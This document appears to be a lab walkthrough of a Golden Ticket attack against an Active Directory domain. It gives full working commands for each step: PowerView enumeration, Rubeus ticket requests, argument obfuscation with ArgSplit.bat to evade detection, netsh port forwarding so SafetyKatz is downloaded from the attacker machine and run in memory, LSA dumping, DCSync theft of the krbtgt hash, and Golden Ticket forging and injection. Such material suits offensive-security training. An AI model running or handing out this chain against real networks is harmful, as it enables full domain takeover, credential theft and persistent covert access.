Active Directory (AD) | Exploiting Domain Admin (Golden Ticket Attack)

Step 1: Identifying Machines with Domain Admin Sessions

To begin our exploitation of domain admin privileges, we first need to identify machines where domain admin accounts are actively logged in. This step is crucial because it allows us to target these machines for further actions, such as stealing tokens or credentials. For this task, we use PowerView, a powerful PowerShell tool that helps in enumerating Active Directory environments. By running the Find-DomainUserLocation command, we can query the Domain Controller to find out which computers have active domain admin sessions. In our example, this command reveals that there is a domain admin session on the dcorp-mgmt server, making it a prime target for our next steps.

Find-DomainUserLocation

There is a domain admin session on dcorp-mgmt server

Step 2: Extracting Domain Controller Hashes

In this step, we aim to extract hashes from the domain controller and create a Golden Ticket using Rubeus. A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) that allows an attacker to impersonate any user within the domain, effectively granting near-unlimited access to network resources.

Start a Process with Domain Admin Privileges

To start, we use an elevated command prompt (Run as administrator) and utilize ArgSplit.bat to encode the asktgt command. This command is part of the Kerberos authentication process, where it requests a TGT for the domain admin account. The TGT is crucial because it allows us to request service tickets for accessing various network resources.

C:\Windows\system32>C:\AD\Tools\ArgSplit.bat
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"

We verify the encoded string to ensure it’s correct:

C:\Windows\system32>echo %Pwn%
asktgt

Next, we run Rubeus with the asktgt command using Loader.exe. This step initiates the process of obtaining a TGT for the domain admin account.

C:\Windows\System32>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Copy Loader.exe to the Domain Controller

After acquiring the TGT, we need to copy Loader.exe to the domain controller (dcorp-dc). We use the xcopy command to transfer the file to ensure it’s available for our use on the target system.

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

Use WinRS to Access the Domain Controller

With Loader.exe on the domain controller, we open a remote session to the domain controller using WinRS. This tool allows us to execute commands remotely over the Windows Remote Management (WinRM) service.

winrs -r:dcorp-dc cmd

Set Up Port Forwarding to download the SafetyKatz

On the domain controller, we set up port forwarding with the netsh interface portproxy command. This step facilitates the download of necessary tools, such as SafetyKatz, by redirecting network traffic to the appropriate address and port.

C:\Users\svcadmin>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x

Encode and Execute lsadump::lsa

Back on the student VM, we use ArgSplit.bat to encode the lsadump::lsa command. This command dumps Local Security Authority (LSA) secrets from memory, including password hashes.

C:\Windows\system32>C:\AD\Tools\ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: lsadump::lsa
set "z=h"
set "y=c"

We run the generated commands in the WinRS session on the domain controller to execute SafetyKatz and perform the LSA dump:

set "Pwn=%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"

The output of lsadump::lsa reveals the NTLM hashes and other credentials stored in the LSA:

mimikatz # lsadump::lsa /patch

Perform a DCSync Attack

To obtain the NTLM hash and AES keys of the krbtgt account, we perform a DCSync attack. This attack simulates the behavior of a domain controller and requests replication of credentials, allowing us to dump password hashes.

C:\Windows\system32>echo %Pwn%
lsadump::dcsync 

C:\Windows\system32>C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"

Step 3: Generate and Inject a Golden Tickets

With the krbtgt hash in hand, we generate a Golden Ticket. A Golden Ticket is a powerful tool in an attacker’s arsenal, as it allows for the creation of a forged TGT that can impersonate any user within the domain, granting near-unlimited access. We use ArgSplit.bat to encode the golden command:

C:\AD\Tools>echo %Pwn%
golden

Using Rubeus, we create the Golden Ticket with the necessary parameters, including the krbtgt hash and domain information:

C:\AD\Tools>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /sid:S-1-5-21-719815819-3726368948 /ldap /user:Administrator /printcmd

Finally, we inject the Golden Ticket into the current process to gain persistent domain admin access. This is confirmed by checking the username and computer name in the remote session, ensuring we have full administrative control over the domain controller:

C:\AD\Tools>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:35 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

Confirm the Golden Ticket injection:

[+] Ticket successfully imported!
C:\AD\Tools>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator>set username
USERNAME=Administrator
C:\Users\Administrator>set computername
COMPUTERNAME=DCORP-DC